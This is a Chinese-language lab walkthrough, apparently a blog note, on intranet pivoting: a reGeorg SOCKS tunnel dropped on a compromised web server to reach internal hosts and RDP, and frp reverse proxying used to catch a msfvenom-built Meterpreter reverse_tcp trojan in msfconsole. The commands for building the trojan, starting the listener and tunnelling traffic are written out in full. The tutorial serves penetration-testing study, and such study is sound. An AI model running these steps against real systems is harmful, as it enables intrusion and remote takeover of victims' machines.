正向代理、反向代理 实战演示

正向代理

代理服务:socks5 应用层协议

环境搭建

攻击机可以访问 socks 代理服务器的 web

socks 代理服务器可以和 kali 通信,也可以和内网主机通信

攻击机无法直接和内网主机通信

  • 攻击机(Win11)

    10.9.47.221

  • socks 代理服务器

    网卡1:10.9.47.172

    网卡2:192.168.1.1

  • 内网主机

    192.168.1.2

正向代理、反向代理 实战演示_第1张图片

代理程序下载

链接:https://pan.baidu.com/s/1kFXhdznQKbmYYduCRvfLQQ?pwd=xyt9
提取码:xyt9

架设过程

失陷主机 Web 根目录(Web 可以访问到的文件)下放

正向代理、反向代理 实战演示_第2张图片

使用攻击机(Win11)访问 socks 服务器的 tunnel.nosocket.php 文件,出现以下结果则说明成功

正向代理、反向代理 实战演示_第3张图片

使用攻击机开启客户端

python2 reGeorgSocksProxy.py -p 8080 -u http://10.9.47.172/tunnel.nosocket.php

正向代理、反向代理 实战演示_第4张图片

正向代理、反向代理 实战演示_第5张图片

浏览器添加 socks 代理

正向代理、反向代理 实战演示_第6张图片

浏览器访问内网

攻击机(Win11)浏览器选择 socks 代理,此时浏览器可以访问内网服务器的 web

正向代理、反向代理 实战演示_第7张图片

而此时攻击机和内网主机不在同一网段

正向代理、反向代理 实战演示_第8张图片

访问内网的其他服务

下载正向代理客户端

正向代理、反向代理 实战演示_第9张图片

链接:https://pan.baidu.com/s/1BIDhFjEFk8DijHZxhUx8Bg?pwd=mr9y
提取码:mr9y

连接服务器

正向代理、反向代理 实战演示_第10张图片

设置哪些 exe 程序要使用代理

正向代理、反向代理 实战演示_第11张图片

连接内网主机的远程桌面程序

正向代理、反向代理 实战演示_第12张图片

输入凭据

正向代理、反向代理 实战演示_第13张图片

成功进入

反向代理

实际渗透时,frp server 在云上,frp client 在攻击主机

frp 客户端向服务器发送链接请求,连接成功后,服务器会把自己收到的流量发送给客户端

frp 客户端和服务器都有自己的配置文件,服务器哪个端口接受的流量,发送给客户端的哪个端口,都必须在配置文件写清楚

frp 下载

链接:https://pan.baidu.com/s/1vBW5z7gOyoPf1dNCRD7DuQ?pwd=ctpl
提取码:ctpl

正向代理、反向代理 实战演示_第14张图片

client 端配置文件

正向代理、反向代理 实战演示_第15张图片

环境搭建

  • kali(NAT 模式)

    192.168.1.128

  • 真实主机(跳板机、frp 服务端)

    10.9.47.90

  • 受害服务器

    10.9.47.172

目的让受害服务器连接 kali 的反弹木马,上线,使用 kali 进行控制

frp 搭建

跳板机(10.9.47.90)启动 frp 服务端程序

.\frps.exe -c frps.ini

正向代理、反向代理 实战演示_第16张图片

kali 下载 Linux 版 frp

链接:https://pan.baidu.com/s/1uLqhyMx06E45OUBNaoxdqA?pwd=s9jv
提取码:s9jv

攻击机 Kali 编辑 frpc.ini 文件

local_port 木马连接的端口

正向代理、反向代理 实战演示_第17张图片

开启 frpc

./frpc -c frpc.ini

正向代理、反向代理 实战演示_第18张图片

木马生成、上传

使用 kali 生成木马文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.9.47.90 LPORT=6789 -f exe > muma.exe

# 让目标服务器向 frp 代理(服务端)发送连接请求,然后代理将流量转发给 kali

正向代理、反向代理 实战演示_第19张图片

开启监听

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp 

set LHOST 127.0.0.1

set LPORT 6789

run

正向代理、反向代理 实战演示_第20张图片

受害者上线

将木马放到受害主机

正向代理、反向代理 实战演示_第21张图片

双击打开上线

正向代理、反向代理 实战演示_第22张图片

正向代理、反向代理 实战演示_第23张图片

你可能感兴趣的:(内网,web安全,笔记,网络安全)